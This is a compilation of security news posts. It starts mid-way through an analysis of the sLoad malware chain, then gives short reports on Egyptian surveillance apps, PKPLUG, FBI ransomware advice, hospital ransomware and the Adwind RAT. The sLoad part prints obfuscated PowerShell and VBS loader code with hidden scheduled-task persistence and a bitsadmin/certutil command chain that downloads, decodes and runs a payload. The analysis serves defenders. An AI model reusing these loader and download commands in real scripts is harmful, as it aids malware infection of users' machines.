  12. WEHxctVdTEoDfqEqJMP=RandomString(4)
  13. […]
  14. Set objFile = objFSO.CreateTextFile(outFile,8, True)
  15. objFile.Write “Set “+JAcalshy+”=rshe” & vbCrLf
  16. objFile.Write “Set “+fZgxNPDMnu+”=ypa” & vbCrLf
  17. objFile.Write “Set “+WEHxctVdTEoDfqEqJMP+”=il” & vbCrLf
  18. objFile.Close
  19. winssh.run “powershell -ep bypass -file .ps1”,0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

  1. try{
  2. Remove-EventLog:Debug-Job
  3. Export-BinaryMiLog:Get-PSSessionConfiguration
  4. Remove-JobTrigger:New-Item
  5. }catch{
  6. $yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  7. if ($yC0iBerAupzdtf5Z.length -lt 2){
  8. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
  9. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  10. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  11. $sv8eJJhgWV3xAN7Uu=@(1..16);
  12. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”
  13. $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  14. $AKXy3OFCowsfie =
  15. [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  16. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  17. Invoke-Expression $DBR4S3t;
  18. }

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “mini.ini” file using the “ConvertFrom-SecureString” function and the ecnryption key contained in “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array. 

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated selecting three ascii char-codes in ranges [65-90] and [67-122]. Then, it decrypts “domain.ini” using the key in the “$main_key” variable. In the end, it saves the results in the “btc.log” file. Continuing the analysis of “main.ini” is possible to spot that the script also grabs system information to check-in the newly infected host.

Figure 5: “domain.ini” file before and after decryption
Figure 6: Some information exfiltrate by the malware before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

  1. $u2K2MQ4 = “`r`n”
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\App’+’Da’+’ta\Ro’+’am’+’ing’;
  4. $hh=’hi’+’dd’+’en’;
  5. $ixXApGeqJKEGY=@(1..16);
  6. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  7. $Erlydj = $Erlydjiyy.UUID;
  8. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  9. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  10. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  11. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  12. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  13. $wsxDITPgQCH+=’76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA’;
  14. […]
  15. $wsxDITPgQCH+=’UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA’;
  16. $wsxDITPgQCH+=’3ADAANQA1AA==’;
  17. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  18. $5r8DcJB4ok4+=’76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA’;
  19. […]
  20. $5r8DcJB4ok4+=’YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA’;
  21. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  22. start-process -windowstyle $hh schtasks ‘/change /tn GoFast /disable’;
  23. $2aWxu9dutZfOPCCgS+=$u2K2MQ4+’Dim ‘;
  24. […]
  25. $nz0oninX6=$ixXApGeqJKEGY -join ‘,’;
  26. $E6M6Np8nhXnu4ndPEJ=’ /F /create /sc minute /mo 3 /TN “U’+$sOmUGoc0ysV8UW+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$Z5lTNXB+’\’+$lNlNrKyk+’.tmp”‘;
  27. start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

  1. $u2K2MQ4 = “rn”;
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\AppData\Roaming’;
  4. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  5. $Erlydj = $Erlydjiyy.UUID;
  6. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  7. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  8. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  9. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  10. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  11. $wsxDITPgQCH=”76492d1 […] A1AA==”;
  12. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  13. $5r8DcJB4ok4=”7649 […] AGIA”;
  14. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  15. start-process -windowstyle hidden schtasks ‘/change /tn GoFast /disable’;
  16. $2aWxu9dutZfOPCCgS=”Dim winssh […] winssh.run “powershell -ep bypass -file vJjFwtSM.ps1″,0,true”;
  17. $2aWxu9dutZfOPCCgS | out-file $Z5lTNXB’\’$lNlNrKyk’.tmp’
  18. $r1uIiPZBhUea0=” $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; […] Invoke-Expression $NLO3lwvn1xWn;}”;
  19. $r1uIiPZBhUea0 | out-file $Z5lTNXB’\’$lNlNrKyk’.ps1′
  20. $nz0oninX6=”1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16″;
  21. $E6M6Np8nhXnu4ndPEJ=”/F /create /sc minute /mo 3 /TN “U52A34D” /ST 07:00 /TR “wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp”;
  22. start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like previous script, this one perform the same operations and create other four file in “%AppData%\Roaming\<active_process>” path. This time the files are:

Figure 7: Files created in “%AppData%\Roaming\<active_process>\”
  • <random_name>.tmp
  • <random_name>.ps1
  • config.ini
  • web.ini

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of “<random_name>.ps1” file is the following. The latest script decrypt the content of “config.ini” file. The following figure shown both encrypted and decrypted “config.ini” file.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operation described in “main.ini” file but use different URLs stored in the “web.ini” file. Also this time, the file is decrypted using an integer array from 1 to 16  as key and contained in “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis, all the C2 URLs seems to be down, so we are not able to detect the final payload family. 

  1. $dPath = [Environment]::GetFolderPath(“MyDocuments”)
  2. $jerry=$starsLord+’\’+$roccon+’_’+$rp;
  3. $clpsr=’/C bitsadmin /transfer ‘+$rp+’ /download /priority FOREGROUND ‘+$line+’ ‘+$jerry+’.txt & Copy /Z ‘+$jerry+’.txt ‘+$jerry+’_1.txt & certutil -decode ‘+$jerry+’_1.txt ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & powershell -command “start-process ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe” & exit’;
  4. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
  5. $clpsr=’/C del ‘+$jerry+’.txt & del ‘+$jerry+’_1.txt & del ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & exit’;
  6. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload

Comparison With Previous Chains

To better understand the evolution of sLoad infection chain, we compared attack attempts observed since 2018 and the latest ones. In both cases, the infection vector is a carefully themed malicious email, weaponized with zip archive containing two files. In the first case the starting point is a “.lnk” file and in the second one the chain starts with a “.vbs” script. 

The sLoad attack chain observed months ago was characterized by some pieces of powershell code appended to the tail of the zip archive. Probably, this technique become more detectable during the time, so it could have been deprecated in latest infections attempts. For both malware variants, the archive contains a legit image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant, the core of the infection is mainly based on powershell scripts and LOLbins. However, the latest stages uses a mix of Powershell and Visual Basic Scripts.


Figure 10: Infection chain workflow

The agent body is still quite similar in the core structure, however the bot now supports new commands such as “Exec” and “Eval”, the latter is able to download further code through the Bitsadmin utility instead of directly rely on “Net.WebClient” primitive. Also, the “ScreenCapture” function have been removed from the new version of the code, in favor to the enhancement of the agent persistence through scheduled task.

Figure 11: Comparison between old and new version on “config.ini” file

Conclusion

sLoad is keeping evolving their TTPs and represents a vivid threat for the Italian cyber-panorama. Also, many times, especially during the last months, its activities in the country involved the abuse of certified mailboxes (PEC) targeting associated professionals and consultants, along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by  Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL encrypted channels, makes detection of this threat difficult for automated systems, and frequently requires analysis abilities or high quality threat intelligence sources to detect and tackle sLoad attack campaigns, many times targeting just a single country.

Experts published a post on the Yoroi blog:

https://blog.yoroi.company/research/the-sload-threat-ten-months-later/

Pierluigi Paganini

(SecurityAffairs – sLoad, malware)

The post The sLoad Threat: Ten Months Later appeared first on Security Affairs.

Egypt regularly spies on opponents and activists with mobile apps

Researchers at Check Point discovered that Egypt ‘ government has been spying citizens in a sophisticated surveillance program

Researchers at Check Point discovered that the Egyptian government has been spying on activists and opponents as part of a sophisticated surveillance program.

The list of victims is long and includes journalists, politicians, activists and lawyers.

The expert started their investigation after Amnesty International published a report in March that provided details on targeted attacks against journalists and human rights activists in Egypt.

The Egyptian government conducted most of the spying activities using mobile apps, some of which are also delivered via Google Play.

Check Point has identified tens of victims that were tricked into download the malicious apps that offered useful services.

Some of the apps used by the attackers were Secure Mail, a Gmail add-on to improve the security, iLoud200%, a smart storage solution that would free up storage space on the victim’s device, and the IndexY callerID service.

Using these apps the government cyber spies were able to gather login credentials to email accounts, bypass privacy settings, and store call logs.

These apps were available through the official Play Store and bypassed the security checks implemented by Google.

Experts provided details of the command and control infrastructure over the time. Attackers used a range of domain names that included words like “secure” and “verify” in their names to avoid raising suspicion of the victims.

“The full list of indicators belonging to this campaign and shared by Amnesty on GitHub showed multiple websites that used keywords such as “mail”, “secure”, or “verify”, possibly not to arouse any suspicions and to masquerade as legitimate mailing services.” reads the report published by Check Point.

“By visualizing the information available about each of these websites, we saw clear connections between them: they were registered using NameCheap, had HTTPS certificates, and many of them resolved to the same IP addresses.”

One of the domains analyzed by the researchers, maillogin[.]live, left a directory unsecured online, allowing the expert to analyze its content, a collection of files uploaded between May and June.

Egypt

“By downloading the contents of this directory, we got our hands on many PHP scripts, API clients, SQL files and configuration files from the server. Looking into them revealed several aspects about the inner workings of this operation, the functionalities that were implemented on this server and possibly others, and lastly some information about the perpetrators behind it all.” continues the analysis.

“For example, we realized that the attackers can control the operation by sending commands to one of the PHP scripts. The script allowed the attackers to query the data stored on the server, but it had self-destructing capabilities as well, such as removing an existing campaign or deleting all of the information collected from victims”

The researchers also discovered a Telegram channel that advertised itself as supporting the opponents of the regime in Egypt, but that is likely under the control of the intelligence services.

Check Point was not able to attribute the operation to the Egyptian intelligence, but the nature of the victims, the level of sophistication of the attacks and other evidence such as a server registered to the Ministry of Communications and Information Technology in Egypt.

“We discovered a list of victims that included handpicked political and social activists, high-profile journalists and members of non-profit organizations in Egypt.” concludes Check Point.

“The information we gathered from our investigation suggested that the perpetrators are Arabic speakers, and well familiar with the Egyptian ecosystem. Because the attack might be government-backed, it means that we are looking at what might be a surveillance operation of a country against its own citizens or of another government that screens some other attack using this noisy one.”

Pierluigi Paganini

(SecurityAffairs – Egypt, surveillance)

The post Egypt regularly spies on opponents and activists with mobile apps appeared first on Security Affairs.

Effective methods for enterprises to detect and prevent network intrusions

Estimated reading time: 2 minutes

Enterprise networks are susceptible to brutal intrusions – some of these intrusions could be in the form of systems on the network running unauthorized applications with vulnerabilities and backdoors. When such vulnerabilities are exploited, unsolicited access to the network occurs which can have a range of unpleasant consequences for businesses.

To prevent such unauthorized intrusions on the network, it is essential to deploy a security solution which can detect these events and work actively towards prevention. An Intrusion Detection System (IDS) monitors all incoming and outgoing network activity and identifies any signs of intrusion in your systems that could jeopardize your business. Its main function is to raise an alert when it discovers any such activity and hence it is commonly known as a passive monitoring system.

Nowadays, IDS systems have received a facelift. We now have an advanced solution viz. IPS that is helping enterprises in a huge way to cope up with the menace of cyber-attacks that happen through business networks.

IPS is part of and a salient feature of Unified Threat Management (UTM), a highly effective product to block threats penetrating via business networks.

What are IPS and how does it help in the prevention of network intrusions?

An Intrusion Prevention System (IPS) is a step ahead of IDS with its capabilities. The system detects and blocks anomalies on a company’s network. It does that through:

  • Monitoring routers, firewalls, key servers and files and matching intrusions with a signature database in the event of a breach
  • Raising an alarm with targeted notifications at key personnel when there is a breach
  • The number of false alarms is low because of the cross-verification with a signature database
  • Detecting patterns by identifying various types of attacks and providing insights on administrators for further protection
  • Maintaining regulatory compliance by providing greater visibility across the entire network

How does UTM as a whole help in defending your business network?

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into your network and forestalls a broad range of DoS and DDoS attacks before they penetrate the network. Deploying this level of protection can benefit an enterprise in various ways, including:

  • Providing a snapshot of network security at one glance
  • Protection of enterprise assets within the network
  • Triggers raised on detection of any suspected breach or activity in the network
  • A holistic approach towards prevention of intrusions

Apart from its powerful Intrusion Prevention System, Seqrite’s Unified Threat Management (UTM) solution is equipped with other key features like Gateway Antivirus, Web Filtering, High Availability, Centralized Management System (CMS), etc. to ensure it acts as the first line of defence against all network attacks.

The post Effective methods for enterprises to detect and prevent network intrusions appeared first on Seqrite Blog.

6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Security experts linked a number of cyber-espionage campaigns observed over the years to the same Chinese threat actor, tracked as PKPLUG.

Security experts linked a number of cyber-espionage campaigns observed over the years to the same Chinese threat actor, tracked as PKPLUG. The name comes from the threat actor using PlugX inside ZIP archives containing the ASCII magic bytes “PK” in the header.

“For three years, Unit 42 has tracked a set of cyber espionage attack campaigns across Asia, which used a mix of publicly available and custom malware. Unit 42 created the moniker “PKPLUG” for the threat actor group, or groups, behind these and other documented attacks referenced later in this report.” reads the report published by Palo Alto Networks. “We say group or groups as our current visibility doesn’t allow us to determine with high confidence if this is the work of one group, or more than one group which uses the same tools and has the same tasking.”

Hackers targeted entities in the Southeast Asia region, most of the victims were in Myanmar, Taiwan, Vietnam, and Indonesia. Experts believe the PKPLUG also targeted other countries in Asia, including Tibet, Xinjiang, and Mongolia. 

The China-linked APT group has been active for at least six years, it used both custom-made and publicly available malware.

Researchers at Palo Alto Networks’ Unit 42 reported that some of the tools used in the campaigns were also involved in attacks carried out by other threat actors.

The experts observed the threat actor mainly delivered the PlugX backdoor, but the attackers also used the HenBox Android malware, the Farseer backdoor for Windows, the 9002 and Zupdax trojans, and Poison Ivy RAT.

Below the timeline of the PKPLUG attacks over the years:

PKPLUG aPt

The first campaign associated with the PKPLUG was observed in November 2013, when the group targeted Mongolian individuals with PlugX RAT. In April 2016, researchers from Arbor Network uncovered a campaign aimed at delivering the Poison Ivy to targets in Myanmar and other countries in Asia. A month later, Unit 42 researchers spotted another campaign that targeted entities from Myanmar, the Uyghur minority, Tibet, Vietnam, Indonesia, and Taiwan with the 9002 Trojan.

In March 2017, the Hong Kong-based cybersecurity company VKRL spotted a campaign targeting entities in Mongolia. One year later, on March 2018, Unit 42 experts spotted a campaign involving a new Android malware family named “HenBox.” Hackers targeted primarily the Uyghurs minority.

Early 2019, Unit 42 researchers discovered a previously-unknown Windows backdoor Trojan called Farseer that was used by the threat actors in attacks against targets in Myanmar. Experts noticed overlaps between the infrastructure and the malware used in different campaigns.

“Overlaps between the different campaigns documented, and the malware families used in them, exist both in infrastructure (domain names and IP addresses being reused, sometimes in multiple cases) and in terms of malicious traits (program runtime behaviors or static code characteristics are also where relationships can be found or strengthened).” continues the analysis.

In at least four of the six campaigns, the threat actors used a shared set of IP addresses as command and control (C2) infrastructure.

Researchers also discovered that attackers used the same registrant for various domain names hosted at those addresses.

“Based on what we know and what we’ve gleaned from others’ publications, and through industry sharing, PKPLUG is a threat group, or groups, operating for at least the last six years using several malware families — some more well-known: Poison Ivy, PlugX, and Zupdax; some are less well-known: 9002, HenBox, and Farseer.” concludes the analysis. “Unit 42 has been tracking the adversary for three years and based on public reporting believes with high confidence that it has origins to Chinese nation-state adversaries.”

Pierluigi Paganini

(SecurityAffairs – PKPLUG, China)

The post 6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group appeared first on Security Affairs.

FBI warns about high-impact Ransomware attacks on U.S. Organizations

The U.S. Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) warns organizations about high-impact ransomware attacks.

In a wake of the recent string of attacks against cities, school districts and hospitals, the U.S. Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) issued organizations about high-impact ransomware attacks.

“Ransomware attacks are becoming more targeted, sophisticated, and costly, even as the overall frequency of attacks remains consistent.” reads the public service announcement published by the IC3.

“Since early 2018, the incidence of broad, indiscriminant ransomware campaigns has sharply declined, but the losses from ransomware attacks have increased significantly, according to complaints received by IC3 and FBI case information. Although state and local governments have been particularly visible targets for ransomware attacks, ransomware actors have also targeted health care organizations, industrial companies, and the transportation sector.”

The FBI has observed cyber organizations using multiple techniques to deliver ransomware, including phishing campaigns and the exploitation of Remote Desktop Protocol (RDP) and software vulnerabilities.

The authorities discourage victims from paying a ransom because there is no guarantee that files will be decrypted. Sometimes crooks don’t decrypt them after the payment, in other cases security issues in the encryption process, or in the malware development, make it impossible to decrypt the data.

FBI urges victims to report the incident to the local FBI field office and to ic3.gov to receive the necessary support.

“Regardless of whether you or your organization have decided to pay the ransom, the FBI urges you to report ransomware incidents to law enforcement.” continues the announcement. “Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under U.S. law, and prevent future attacks.”

Reporting the ransomware attacks to the FBI will help law enforcement to track the crooks behind the campaign and to collect the indicators of compromise associated with the threat.

Below the cyber defense best practices shared by the FBI:

• Regularly back up data and verify its integrity
• Focus on awareness and training
• Patch the operating system, software, and firmware on devices
• Enable anti-malware auto-update and perform regular scans
• Implement the least privilege for file, directory, and network share permissions
• Disable macro scripts from Office files transmitted via email
• Implement software restriction policies and controls
• Employ best practices for use of RDP
• Implement application whitelisting
• Implement physical and logical separation of networks and data for different org units
• Require user interaction for end-user apps communicating with uncategorized online assets

Pierluigi Paganini

(SecurityAffairs – FBI, ransomware)

The post FBI warns about high-impact Ransomware attacks on U.S. Organizations appeared first on Security Affairs.

Dutch police shut down bulletproof service hosting tens of DDoS botnets

Dutch police seized a bulletproof hosting service in a major takedown, the infrastructure was used by tens of IoT botnets involved in DDoS attacks.

A joint operation conducted by the Netherlands’ National Criminal Investigation Department and National Cyber Security Center allowed to track down and seize five servers that were composing a cybercrime underground bulletproof hosting service.

The servers were hosted at an unnamed data center in Amsterdam, it was used by tens of IoT botnets involved in DDoS attacks worldwide. The bulletproof hosting service was used to host malware and command and control systems of several DDoS botnets.

“Middelburg, Veendam, Amsterdam, Driebergen – The police has taken five servers offline that were used to control a version of a so-called botnet.” reads the press release published by the Dutch police. “The hardware was seized and the business operations stopped. A 24-year-old man from Veendam and a 28-year-old man from Middelburg were arrested on Tuesday evening. They are suspected of, among other things, computer breach and the spread of malware.”

Authorities revealed that they have received more than three thousand reports of malware spread through the bulletproof hosting service.over a period of one year.

The authorities also arrested two Dutch nationals who had been running a Mirai botnet from the servers of KV Solutions BV (KV hereinafter) bulletproof hosting service.

In this case, the police say, the people controlling those servers were a pair of Dutch nationals who had been running a Mirai botnet with cover from the bulletproof host.

“The investigation also revealed that this botnet was very aggressively trying to infect other devices, up to over a million attempts per month on one device,” the translated police statement reads.

“The investigation also revealed that this botnet was very aggressively trying to infect other devices, up to over a million attempts per month on one device. Which DDoS attacks can be attributed to this botnet is part of the further investigation.” continues the statement.

Authorities are analyzing the seized servers and the data they contain will likely lead to the arrests of other players in the cybercrime underground.

Pierluigi Paganini

(SecurityAffairs – bulletproof hosting service, malware)

The post Dutch police shut down bulletproof service hosting tens of DDoS botnets appeared first on Security Affairs.

New Research into Russian Malware

There's some interesting new research about Russian APT malware:

The Russian government has fostered competition among the three agencies, which operate independently from one another, and compete for funds. This, in turn, has resulted in each group developing and hoarding its tools, rather than sharing toolkits with their counterparts, a common sight among Chinese and North Korean state-sponsored hackers.

"Every actor or organization under the Russain APT umbrella has its own dedicated malware development teams, working for years in parallel on similar malware toolkits and frameworks," researchers said.

"While each actor does reuse its code in different operations and between different malware families, there is no single tool, library or framework that is shared between different actors."

Researchers say these findings suggest that Russia's cyber-espionage apparatus is investing a lot of effort into its operational security.

"By avoiding different organizations re-using the same tools on a wide range of targets, they overcome the risk that one compromised operation will expose other active operations," researchers said.

This is no different from the US. The NSA malware released by the Shadow Brokers looked nothing like the CIA "Vault 7" malware released by WikiLeaks.

The work was done by Check Point and Intezer Labs. They have a website with an interactive map.

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks hit US and Australian hospitals and health service providers causing the paralysis of their systems.

Several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, had limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems impacted at least seven hospitals in Australia. The information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria have been impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory,

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


The post Ten hospitals in Alabama and Australia have been hit with ransomware attacks appeared first on Security Affairs.

A new Adwind variant involved in attacks on US petroleum industry

Adwind is back, a new variant of the popular RAT is targeting US petroleum industry entities with new advanced features.

A new variant of the popular Adwind RAT (aka jRATAlienSpy, and JSocket) is targeting entities in the US petroleum industry. The new variant implements advanced features such as multi-layer obfuscation. The malware is distributed via a malspam campaign, the spam messages come with malicious attachments or include URL to malicious content.

“A new campaign spreading the Adwind RAT has been seen in the wild, specifically targeting the petroleum industry in the US. The samples are relatively new and implement multi-layer obfuscation to try to evade detection.” reads the analysis published by NetSkope. “We found multiple RAT samples hosted on the serving domain and spread across multiple directories, all hosted within the last month.”

Adwind is a cross-platform Remote Access Trojan written in Java, it was observed in attacks against aerospace enterprises in Switzerland, Austria, Ukraine, and the US. The Adwind RAT was first discovered early 2012, the experts dubbed it Frutas RAT and later it was identified with other names, Unrecom RAT (February 2014), AlienSpy (October 2014), and recently JSocket RAT (June 2015).

Adwind is could infect all the major operating systems, including Windows, Mac, Linux, and Android, it is available in the cybercrime underground as a malware-as-a-service (MaaS) model.

Once the Adwind RAT has infected a computer it can recruit it into a botnet for several illegal purposes (i.e. DDoS attacks, brute-forcing attacks).

Experts pointed out that the functionality of the RAT has remained the same as previous variants, the major change is in the obfuscation technique it implements. The malware uses delivers RAT payloads via nested JAR archives. The Netskope Threat Protection detects the malware as ByteCode-JAVA.Trojan.Kryptik and Gen:Variant.Application.Agentus.1.

“When the victim executes the payload, there are multiple levels of JAR extractions that occur.” continues the analysis

Netskope researchers discovered 20 malware samples hosted using compromised user accounts of the Australian ISP Westnet.

“The Adwind RAT is a well-known malware family that has actively been used in multiple campaigns over the last couple of years. The samples we analyzed showed that the VirusTotal detection ratio for the top-level JAR was 5/56 while that of the final decrypted JAR was 49/58.” conclude the expert. “These detection ratios indicate that attackers have largely been successful in developing new, innovative obfuscation techniques to evade detection.”

Netyskope’s report includes Indicators of compromise (IOCs), malware sample hashes for various JAR payloads used in these attacks, and IP addresses and domains of C&C infrastructure.

Pierluigi Paganini

(SecurityAffairs – Adwind, malware)

The post A new Adwind variant involved in attacks on US petroleum industry appeared first on Security Affairs.

Danish company Demant expects to incur losses of up to $95 after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that caused important problems to its operations, the company has yet to recover after the attack, a circumstance that suggests it was hit by a ransomware attack.

Demant expects to incur losses of up to $95 million following the incident, which includes a deduction of $14.6 million of expected insurance coverage.

We are therefore talking about figures that come into the list of the most important losses caused by cyber attacks.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransom incident.

“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported ComputerWord.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who is a daily employee of IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across Demant network have not been able to regularly provide to their service to end-users.

The impact is predominately related to the estimated lost sales and on the growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident is important because demonstrates the potential impact of a cyber attack on organizations and urges them to adopt necessary countermeasures.

